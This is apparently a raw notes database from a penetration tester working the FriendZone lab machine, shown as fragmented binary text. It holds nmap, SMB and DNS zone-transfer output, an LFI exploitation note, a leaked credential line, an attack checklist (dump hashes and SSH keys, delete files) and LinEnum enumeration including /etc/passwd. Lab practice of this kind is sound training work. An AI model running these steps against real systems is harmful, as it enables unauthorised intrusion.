SQLite format 3@ u-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.xcustom-colors$A[Y)A֕W'  TCP nmap -sC -sV -oA ./friendzone 10.10.10.123 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 20:48 EDT Nmap scan report for 10.10.10.123 Host is up (0.065s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA) | 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA) |_ 256 00:4e:1a:4f:33sk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.xcustom-colorsA"A #F^, '  SMB smbclient -Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Ln )'  Other Servicescustom-colorsXA[Ad \v)' t){'  Script Results ##4%'  ExploitationService Exploited: SMB and PHP Parameter Validation Vulnerability Type: Local File Inclusion LFI Exfu'   Other dig axfr friendzone.red @10.10.10.123 ;i '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!B, '  SMB smbclient -L 10.10.10.123 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers Files Disk Frieq AA#/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File System ########################q/'  Post Exploitationcustom-colors*AIZnnZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg O^Og'  Goodiescustom-colorsVA?& c8+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ u+ '   Priv EscalationService Exploited:p)c'  Scheduled JobsScheduled Taskscustom-colors$ANl ++,'  Passwords admin:WORKWORKHhallelujah@# = administrator1.friendzone.red custom-colors$Aס|2 J#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1L/5'  Proof\Flags\Otherroot@FriendZone:~# ls /home ls /home friend ff'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., KK(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xh  ' Log Bookcustom-colors(AI^ <<>> DiG 9.11.14-3-Debian <<>> axfr friendzone.red @10.10.10.123 ;; global options: +cmd friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 friendzone.red. 604800 IN AAAA ::1 friendzone.red. 604800 IN NS localhost. friendzone.red. 604800 IN A 127.0.0.1 administrator1.friendzone.red. 604800 IN A 127.0.0.1 hr.friendzone.red. 604800 IN A 127.0.0.1 uploads.friendzone.red. 604800 IN A 127.0.0.1 friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 ;; Query time: 64 msec ;; SERVER: 10.10.10.123#53(10.10.10.123) ;; WHEN: Thu Apr 02 09:05:35 EDT 2020 ;; XFR size: 8 records (messages 1, bytes 289) custom-colorsA[EϯAס|################################# # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Thu Apr 2 17:00:45 EEST 2020  ### SYSTEM ############################################## [-] Kernel information: Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.15.0-36-generic (buildd@lgw01-amd64-031) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.1 LTS" NAME="Ubuntu" VERSION="18.04.1 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.1 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic [-] Hostname: FriendZone ### USER/GROUP ########################################## [00;31m[-] Current user/group info: uid=33(www-data) gid=33(www-data) groups=33(www-data) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Thu Jan 24 01:12:41 +0200 2019 friend pts/0 10.10.14.3 Thu Jan 24 01:20:15 +0200 2019 [-] Who else is logged on: 17:00:45 up 13:11, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(uuidd) gid=109(uuidd) groups=109(uuidd) uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=107(Debian-exim) gid=114(Debian-exim) groups=114(Debian-exim) uid=108(ftp) gid=115(ftp) groups=115(ftp) uid=109(bind) gid=116(bind) groups=116(bind) [-] It looks like we have some admin users: uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin friend:x:1000:1000:friend,,,:/home/friend:/bin/bash sshd:x:106:65534::/run/sshd:/usr/sbin/nologin Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin bind:x:109:116::/var/cache/bind:/usr/sbin/nologin [-] Super user account(s): root [-] Accounts that have recently used sudo: /home/friend/.sudo_as_admin_successful [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Oct 5 2018 . drwxr-xr-x 22 root root 4.0K Oct 5 2018 .. drwxr-xr-x 5 friend friend 4.0K Jan 24 2019 friend [-] Files not owned by user but writable by group: -rwxrw-rw- 1 nobody nogroup 5493 Apr 2 16:43 /etc/Development/phprs.php -rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py [-] Files owned by our user: -rwxrwxrwx 1 www-data www-data 46631 Mar 23 03:36 /tmp/LinEnum.sh -rw-rw-rw- 1 www-data www-data 5905 Apr 2 17:00 /tmp/output.txt [-] Hidden files: -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.daily/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.d/.placeholder -rw-r--r-- 1 root ro!ot 1531 Oct 5 2018 /etc/apparmor.d/cache/.features -rw------- 1 root root 0 Oct 5 2018 /etc/.pwd.lock -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.hourly/.placeholder -rw-r--r-- 1 friend friend 220 Oct 5 2018 /home/friend/.bash_logout -rw-r--r-- 1 friend friend 3771 Oct 5 2018 /home/friend/.bashrc -rw-r--r-- 1 friend friend 0 Oct 5 2018 /home/friend/.sudo_as_admin_successful -rw-r--r-- 1 friend friend 807 Oct 5 2018 /home/friend/.profile -rw-r--r-- 1 root root 962 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/.missing-syscalls.d -rw-r--r-- 1 root root 216841 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/.config -rw-r--r-- 1 root root 61112 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/.cache.mk -rw-r--r-- 1 root root 5874 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.sigchain.o.cmd -rw-r--r-- 1 root root 429 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.fixdep-in.o.cmd -rw-r--r-- 1 root root 7260 Sep 24 2018 /usr/src/l"inux-headers-4.15.0-36-generic/tools/objtool/.builtin-orc.o.cmd -rw-r--r-- 1 root root 7823 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.orc_gen.o.cmd -rw-r--r-- 1 root root 6511 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.exec-cmd.o.cmd -rw-r--r-- 1 root root 1265 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.libsubcmd-in.o.cmd -rw-r--r-- 1 root root 8216 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.elf.o.cmd -rw-r--r-- 1 root root 4467 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.fixdep.o.cmd -rw-r--r-- 1 root root 7710 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.special.o.cmd -rw-r--r-- 1 root root 1815 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.objtool-in.o.cmd -rw-r--r-- 1 root root 6876 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.pager.o.cmd -rw-r--r-- 1 root root 6243 Sep 24 2018 /usr/src/linux-headers-4.#15.0-36-generic/tools/objtool/.objtool.o.cmd -rw-r--r-- 1 root root 4322 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.str_error_r.o.cmd -rw-r--r-- 1 root root 2085 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.subcmd-config.o.cmd -rw-r--r-- 1 root root 7899 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.check.o.cmd -rw-r--r-- 1 root root 5696 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.libstring.o.cmd -rw-r--r-- 1 root root 6301 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.parse-options.o.cmd -rw-r--r-- 1 root root 3676 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.fixdep.o.d -rw-r--r-- 1 root root 8137 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.orc_dump.o.cmd -rw-r--r-- 1 root root 8140 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.run-command.o.cmd -rw-r--r-- 1 root root 8479 Sep 24 2018 /usr/src/linux-headers-4.15.$0-36-generic/tools/objtool/arch/x86/.decode.o.cmd -rw-r--r-- 1 root root 458 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/arch/x86/.objtool-in.o.cmd -rw-r--r-- 1 root root 6998 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.builtin-check.o.cmd -rw-r--r-- 1 root root 7133 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/tools/objtool/.help.o.cmd -rw-r--r-- 1 root root 21 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/.8120.d -rw-r--r-- 1 root root 13593 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 146 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 4624 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 root root 4645 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/tools/.relocs_64.o.cmd -rw-r--r-- 1 root root 4645 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/%tools/.relocs_32.o.cmd -rw-r--r-- 1 root root 59941 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 275 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd -rw-r--r-- 1 root root 300 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 280 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 252 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 276 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 252 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 280 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/&arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 364 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 155 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3302 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 359 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.purgatory.ro.cmd -rw-r--r-- 1 root root 343 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.cache.mk -rw-r--r-- 1 root root 1608 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root root 1488 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 6286 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 ro'ot root 9593 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 1468 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 216965 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/.config.old -rw-r--r-- 1 root root 5401 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.insert-sys-cert.cmd -rw-r--r-- 1 root root 4982 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 6749 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 1528 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/basic/.bin2c.cmd -rw-r--r-- 1 root root 5474 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 3536 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 110 Sep 24 2018 /usr/src/linux-headers(-4.15.0-36-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 6321 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 5553 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 3812 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 3736 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 6365 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 5820 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 2974 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 129 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 4820 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/script)s/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 104 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 6158 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 5861 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 5731 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 6230 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 4799 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 4535 Sep 24 2018 /usr/src/linux-headers-4.15.0-36-generic/scripts/.asn1_compiler.cmd -rw-r--r-- 1 root root 33 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 162 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/.gitignore -rw-r--r-- 1 root root 1*3 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/basic/.gitignore -rw-r--r-- 1 root root 25 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 31 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 154 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 55 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/mod/.gitignore -rw-r--r-- 1 root root 24 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/gcc-plugins/.gitignore -rw-r--r-- 1 root root 54 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/dtc/.gitignore -rw-r--r-- 1 root root 21 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 28 2018 /usr/src/linux-headers-4.15.0-36/scripts/selinux/genheaders/.gitignore [-] World-readable files within /home: -rw-r--r-- 1 friend friend 220 Oct 5 2018 /home/friend/.bash_logout -rw-r--r+-- 1 friend friend 3771 Oct 5 2018 /home/friend/.bashrc -rw-r--r-- 1 friend friend 0 Oct 5 2018 /home/friend/.sudo_as_admin_successful -rw-r--r-- 1 friend friend 807 Oct 5 2018 /home/friend/.profile -r--r--r-- 1 root root 33 Oct 6 2018 /home/friend/user.txt [-] Home directory contents: total 36K drwxr-xr-x 8 root root 4.0K Oct 6 2018 . drwxr-xr-x 12 root root 4.0K Oct 6 2018 .. drwxr-xr-x 3 root root 4.0K Jan 16 2019 admin drwxr-xr-x 4 root root 4.0K Oct 6 2018 friendzone drwxr-xr-x 2 root root 4.0K Oct 6 2018 friendzoneportal drwxr-xr-x 2 root root 4.0K Jan 15 2019 friendzoneportaladmin drwxr-xr-x 3 root root 4.0K Oct 6 2018 html -rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf drwxr-xr-x 3 root root 4.0K Oct 6 2018 uploads [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: APACHE_LOG_DIR=/var/log/apache2 LANG=C OLDPW,D=/ INVOCATION_ID=5ea0aea7460e4121b3a4be5062af1996 APACHE_LOCK_DIR=/var/lock/apache2 PWD=/tmp JOURNAL_STREAM=9:23505 APACHE_RUN_GROUP=www-data APACHE_RUN_DIR=/var/run/apache2 APACHE_RUN_USER=www-data APACHE_PID_FILE=/var/run/apache2/apache2.pid SHLVL=2 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin drwxr-xr-x 2 root root 4096 Oct 5 2018 /bin drwxr-xr-x 2 root root 4096 Jan 23 2019 /sbin drwxr-xr-x 2 root root 20480 Jan 23 2019 /usr/bin drwxr-xr-x 2 root root 4096 Oct 5 2018 /usr/local/bin drwxr-xr-x 2 root root 4096 Oct 5 2018 /usr/local/sbin drwxr-xr-x 2 root root 12288 Jan 23 2019 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/bash /bin/rbash /bin/dash [-] Current umask value: 0000 u=rwx,g=rwx,o=rwx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and -storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Oct 6 2018 . drwxr-xr-x 90 root root 4096 Jan 23 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 712 Jan 18 2018 php -rw-r--r-- 1 root root 191 Oct 5 2018 popularity-contest /etc/cron.daily: total 64 drwxr-xr-x 2 root root 4096 Oct 6 2018 . drwxr-xr-x 90 root root 4096 Jan 23 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 539 Jun 27 2018 apache2 -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 3 2017 dpkg -rwxr-xr-x 1 root root 4128 Jan 28 2018 exim4-base -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x. 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 383 Apr 18 2018 samba -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Oct 5 2018 . drwxr-xr-x 90 root root 4096 Jan 23 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Oct 5 2018 . drwxr-xr-x 90 root root 4096 Jan 23 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 16 drwxr-xr-x 2 root root 4096 Oct 5 2018 . drwxr-xr-x 90 root root 4096 Jan 23 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # comm/and to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. 